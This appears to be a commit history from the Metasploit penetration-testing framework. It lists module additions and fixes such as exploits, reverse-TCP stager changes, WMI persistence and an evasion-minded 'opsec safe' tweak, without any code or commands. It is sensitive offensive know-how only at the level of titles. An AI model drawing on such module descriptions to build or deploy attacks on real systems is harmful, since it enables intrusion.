2017-07-11 16:07:13 -04:00
Adam Cammack
14b37c2101
Land #8691 , Improve php reverse_tcp stager logic
2017-07-11 13:50:27 -05:00
Tim
db8698e82b
Land #8655 , add error handling to mipsle linux reverse tcp stager
2017-07-11 22:33:54 +08:00
Matt Robinson
55cbd9b6a9
Add headers to php_eval
2017-07-10 21:25:27 -04:00
David Maloney
6d7a066477
fixes oracle_hashdump and jtr_oracle_fast modules
...
fixes functionality in the oracle database hashdumper
and the oracle hash cracker modules
2017-07-10 16:57:57 -05:00
wchen-r7
50b1ec4044
Fix #8675 , Add Cache-Control header, also meta tag for BAP2
...
Hopefully that browsers will respect this.
Fix #8675
2017-07-10 16:05:09 -05:00
Spencer McIntyre
53d5060fbd
Add the LPE for CVE-2017-9769
2017-07-10 16:57:23 -04:00
wchen-r7
fe360e3e2a
Fix #8685 , Check nil condition for #wordlist_file in jtr modules
...
JTR modules should never assume there is always a database
connected while using #wordlist_file, considering a database is
an optional component for Framework.
Fix #8685
2017-07-10 11:18:20 -05:00
David Maloney
2ee6df66cf
Land #8514 , wmi persistence module
2017-07-10 09:53:55 -05:00
NickTyrer
f4c739c190
check if running as system
2017-07-10 10:05:57 +01:00
RageLtMan
df697aa23c
Implement HttpClient options generation from URL
...
To address the complexity which comes with the flexibility offered
by Rex::Proto::Http::Client and its Msf mixin descendant, a simple
process needs to be implemented for issuing a request using only
the URL string in order to provide ease of access to users who may
not have the time to study how these clients work in detail.
Implement :request_opts_from_url in Msf's HttpClient mixin such as
to extract the options required for :send_request_* from a URL
string passed into the method. This approach reduces HTTP requests
in the mixin to `send_request_raw(request_opts_from_url(url))` when
`url` is just a string.
Implement this approach in the http_pdf_authors gather module to
further reduce infrastructure complexity around the simple need to
acquire PDF files via HTTP/S.
Testing:
Local to this module only, and in Pry of course. Seems to work...
2017-07-10 04:19:26 -04:00
RageLtMan
997150a215
Use Msf::Exploit::Remote::HttpClient
...
Replace Net::HTTP usage with proper Rex::Proto::Http::Client via
the Msf module mixin. Generate the request opts from the same URI
parsed URL string, execute a one shot GET request, disconencting
after reciept of results. Depending on the response code, either
pass back an empty StringIO or if its 200, a StringIO(res.body).
2017-07-10 03:37:41 -04:00
Dave Farrow
653890f9d4
fixed unit tests
2017-07-09 16:08:32 -07:00
Emanuel Bronshtein
df024bb594
Remove duplicate setting of suhosin.simulation
2017-07-10 00:46:05 +03:00
jvoisin
263a42707e
Fix a typo
2017-07-09 16:34:51 +02:00
jvoisin
8510cda5ae
Implement @bcoles advices
2017-07-09 16:34:10 +02:00
Tim
75c571de83
Land #8653 , add error handling to mipsbe linux reverse tcp stager
2017-07-09 19:36:15 +08:00
Tim
cd0c2c213f
pedantic tweaks
2017-07-09 19:36:03 +08:00
Corey Harding
50339289a7
Update rfpwnon.rb
2017-07-09 05:12:35 -04:00
jvoisin
f10cf75ae0
Fix some stuff
2017-07-09 10:45:15 +02:00
jvoisin
5fe805aaca
s/\t/ /g
2017-07-09 02:29:37 +02:00
jvoisin
968fa0c244
Add even more references
2017-07-09 02:27:54 +02:00
jvoisin
ae930ae7c1
Add a module for CVE-2017-7615
2017-07-09 02:14:21 +02:00
Brendan Coles
8e2ff7a4c5
Add command stager and code cleanup
2017-07-07 16:54:56 -05:00
William Vu
b3be89b508
Land #8663 , typo fix for zoomeye_search
2017-07-07 16:53:48 -05:00
dmohanty-r7
8f464e17a1
Land #8658 , Add Gather PDF Authors auxiliary module
2017-07-07 16:20:29 -05:00
MD5HashBrowns
e5244f3113
Fixed typo
2017-07-07 15:26:37 -04:00
Brendan Coles
683ce10167
Add URL option
2017-07-07 18:42:00 +00:00
Brent Cook
3bda361544
add old hackingteam leak name
2017-07-07 00:52:11 -05:00
Brent Cook
f4820d24fb
add a few more AKA references
2017-07-06 22:43:46 -05:00
Brendan Coles
d864ce16b1
Add Gather PDF Authors auxiliary module
2017-07-06 23:29:17 +00:00
William Vu
f45facdf6e
Fix HTTP verb in jboss_vulnscan print_status
2017-07-06 14:55:33 -05:00
tkmru
a4a959266b
update cachedSize
2017-07-06 17:43:27 +09:00
tkmru
ed0b5a843d
add error handling bin to reverse_tcp on mipsbe
2017-07-06 17:34:22 +09:00
tkmru
2d8a71de6f
tab to space
2017-07-05 18:22:06 +09:00
tkmru
615eb53796
update cachedSize
2017-07-05 18:05:38 +09:00
tkmru
d02d6826a9
fix reverse tcp stager src
2017-07-05 17:56:59 +09:00
tkmru
d1f08a80bd
add error handling to reverse_tcp on mipsbe
2017-07-05 17:50:49 +09:00
Brendan Coles
baff473cae
Add Metasploit RPC Console Command Execution module
2017-07-05 08:48:35 +00:00
syndrome5
45af651993
Fix issue generate/launch path
...
Generate file in C:\ but try to launch it in Documents and Settings\All Users\Application Data\7T\
PoC with windows/meterpreter/reverse_tcp
2017-07-04 22:14:32 +02:00
dmohanty-r7
aa387e96a7
Land #8577 , Add SurgeNews User Credentials scanner
2017-07-03 10:14:03 -05:00
Roman
38b1e56bbd
negated wording regarding legacy auth
...
According to the docs this variable means the opposite:
https://dev.mysql.com/doc/refman/5.5/en/mysql-command-options.html#option_mysql_secure-auth
OFF -> insecure
ON -> secure
2017-07-03 14:29:07 +02:00
Brendan Coles
dff96ce9a0
Re-order includes with Auxiliary::Scanner last
2017-07-01 08:30:17 +00:00
Pearce Barry
a2602bf514
Land #8600 , Add GoAutoDial 3.3 RCE Command Injection / SQL injection module
2017-06-30 17:32:51 -05:00
Pearce Barry
dd530a2953
Minor indentation tweaks.
2017-06-30 17:29:43 -05:00
Pearce Barry
3d4d03c9b4
Land #8575 , Cerberus Helpdesk hash disclosure
2017-06-30 16:02:53 -05:00
Brent Cook
40f0d36f6b
Land #8615 , add @artkond's DoS module for Cisco CVE-2017-3881
2017-06-30 11:17:09 -04:00
NickTyrer
994f00622f
tidy module output
2017-06-29 16:12:23 +01:00
William Vu
7e1b50ab3b
Land #8629 , AKA (also known as) module reference
2017-06-28 19:15:45 -05:00
Brent Cook
aa8c580aba
updates
2017-06-28 20:14:38 -04:00
Brent Cook
d20036e0fb
revise spelling, add heartbleed and tidy checks
2017-06-28 18:50:20 -04:00
William Vu
43d8c4c5e7
Land #8519 , Apache ActiveMQ file upload exploit
2017-06-28 17:19:39 -05:00
Brent Cook
461ab4501d
add 'Also known as', AKA 'AKA', to module references
2017-06-28 15:53:00 -04:00
thesubtlety
a87f937634
fix msftidy warning
2017-06-28 11:53:11 -04:00
William Webb
6349026134
Land #8442 , Exploit module for Backup Exec Windows Agent UaF
2017-06-28 10:39:28 -05:00
thesubtlety
e1ca78e6c6
add option to enable job log parsing
2017-06-27 19:01:12 -04:00
thesubtlety
29c6f41622
add longer timeout for large file systems
2017-06-27 18:38:54 -04:00
Spencer McIntyre
0da9f4d64a
Refactor railgun "DLL" references to library
2017-06-27 17:34:06 -04:00
Brent Cook
cb82bdc6a9
Land #8607 , add error handling to x64 Linux stagers
2017-06-27 03:53:07 -05:00
Brent Cook
0d9f57ad7c
add @artkond's DoS module for Cisco CVE-2017-3881
...
This makes a few improvements, adds module docs.
2017-06-27 01:53:23 -05:00
thesubtlety
10c663dd3e
initial commit
2017-06-27 01:37:22 -04:00
William Vu
66161b10c5
Land #8455 , post module for mounting VMDKs
2017-06-27 00:35:48 -05:00
William Vu
639f341b21
Clean up module
2017-06-26 15:08:37 -05:00
Brent Cook
05c72214ae
Land #8205 , Add Satel SenNet Command Exec Module
2017-06-25 18:01:44 -05:00
Rob Fuller
2918b3af13
Land #8599 , Dynamic DNS updater module
2017-06-25 15:08:22 -05:00
Brent Cook
07e7baebb8
sign my name
2017-06-25 14:59:01 -05:00
Brent Cook
7bc0dcea42
add ipv6 support for CHOST
2017-06-25 14:57:15 -05:00
Mzack9999
66eb89e72a
Exploit now uses HTTP mixin
2017-06-25 16:38:21 +02:00
tkmru
084b211e9b
add x64 stager_sock_reverse src
2017-06-25 16:31:37 +09:00
Brent Cook
269597f994
add initial CHOST support
2017-06-24 18:57:43 -05:00
Brent Cook
eee1eff034
improve resolve / add / delete logic
2017-06-24 18:36:01 -05:00
Brent Cook
b36d56bed3
handle RXDomain on lookup failure
2017-06-24 18:10:50 -05:00
tkmru
0685cb5ab4
update CacheSize
2017-06-25 06:25:07 +09:00
tkmru
799fcbd9e7
add error handling to x64 reverse tcp stager
2017-06-25 06:22:25 +09:00
NickTyrer
bc8de0fc66
fixed issue where starting waitfor.exe would hang the module
2017-06-24 20:54:31 +01:00
NickTyrer
aa18598580
updated cleanup method to remove_persistence to prevent creating rc file even if module fails
2017-06-24 19:20:02 +01:00
h00die
f9493f46d7
bcole fixes
2017-06-24 14:06:11 -04:00
Brent Cook
c8755a3a7a
add pre-flight checks, log a lot more info
2017-06-24 12:32:15 -05:00
h00die
cc9326d946
bcoles updates and table printing
2017-06-24 13:01:39 -04:00
Brent Cook
8f3c470bb3
make usage more intuitive, remove weird defaults
2017-06-24 11:52:52 -05:00
NickTyrer
655358cdf1
added missing newline in cleanup method
2017-06-23 17:58:11 +01:00
NickTyrer
916a4da182
fixed cleanup method to include all cleanup options
2017-06-23 17:38:48 +01:00
NickTyrer
412ea9432d
removed whitespace
2017-06-23 17:17:07 +01:00
NickTyrer
e7d6d5350f
added WAITFOR persistence method
2017-06-23 17:05:39 +01:00
Mzack9999
a8865252da
Added exploit documentation
2017-06-23 14:12:04 +02:00
OJ
5588d0f7b2
Update payload cached sizes
2017-06-23 13:45:04 +10:00
Brent Cook
fda2e8c73d
Land #8523 , Add support for session GUIDs
2017-06-22 20:10:10 -05:00
dmohanty-r7
18410d8230
Land #8540 , Add Symantec Messaging Gateway RCE
2017-06-22 19:00:32 -05:00
Brent Cook
24c43b1822
reregister rhost
2017-06-22 18:33:19 -05:00
Brent Cook
ca813e7a5c
fix message formatting
2017-06-22 18:21:33 -05:00
Brent Cook
823260cc04
fix error message
2017-06-22 18:11:07 -05:00
Brent Cook
3cf722a45d
use correct preqrequisites
2017-06-22 18:08:20 -05:00
Brent Cook
5e48a11e60
handle specific exceptions, update docs
2017-06-22 18:01:52 -05:00
Brent Cook
6a261b172f
move from scanner to admin
2017-06-22 17:47:04 -05:00
Brent Cook
125d14f81e
simplify module, add AAAA support
2017-06-22 17:44:55 -05:00
KINGSABRI
b618e5ca6f
Add more exception handling, fix tidy rules
2017-06-22 15:55:04 -05:00
KINGSABRI
ce124e6090
Add CNAME record
2017-06-22 15:55:04 -05:00
KINGSABRI
5528084e27
add Dnsruby
2017-06-22 15:55:04 -05:00
KINGSABRI
2410a3232f
Adding DNS Server Dynamic Update Record Injection module
2017-06-22 15:41:25 -05:00
Brent Cook
4fdd77f19a
Land #8051 , Add Netgear DGN2200v1/v2/v3/v4 Command Injection Module
2017-06-22 11:46:40 -05:00
Brent Cook
a4e8cdfa6e
msftidy fixes
2017-06-22 11:44:40 -05:00
Brent Cook
3b248c78f3
resurrect old example modules, integrate into module tree
2017-06-22 11:36:35 -05:00
William Webb
02e4edc4cb
Land #8579 , Easy File Sharing HTTP Server 7.2 - Post Overflow exploit
2017-06-22 10:56:41 -05:00
William Webb
47a659f554
Land #8185 , Convert ntp modules to bindata
2017-06-22 09:37:58 -05:00
Jin Qian
b51fc0a34e
Land #8489 , more httpClient modules use store_valid_credential
2017-06-21 17:18:34 -05:00
Jeffrey Martin
99fb905bbd
fix typo
2017-06-21 16:52:09 -05:00
William Vu
ceba4e6d61
Add pointer to CDX API
2017-06-21 12:34:40 -05:00
William Vu
c12056d242
Fix enum_wayback using CDX API
2017-06-21 12:29:15 -05:00
NickTyrer
24404ae40f
added heredoc to tidy formatting
...
changed USER persistence method to EVENT to better describe technique
removed "auditpol.exe /set /subcategory:Logon /failure:Enable" command from subscription_event method to be more opsec safe
added CUSTOM_PS_COMMAND advanced option
updated description to reflect changes
2017-06-21 18:15:13 +01:00
Pearce Barry
24d9bec0ae
Land #8260 , OpManager Version Check
2017-06-20 17:58:10 -05:00
Pearce Barry
241786e71f
Update description with tested versions.
2017-06-20 15:32:08 -05:00
Pearce Barry
14f0409c6c
Missing regex '+', readding so we get full API key.
2017-06-20 15:28:15 -05:00
Pearce Barry
b02719e795
Attempt to appease Travis...
2017-06-20 11:36:08 -05:00
Mzack9999
c7a55ef92f
Added exploit documentation
2017-06-20 09:03:40 +02:00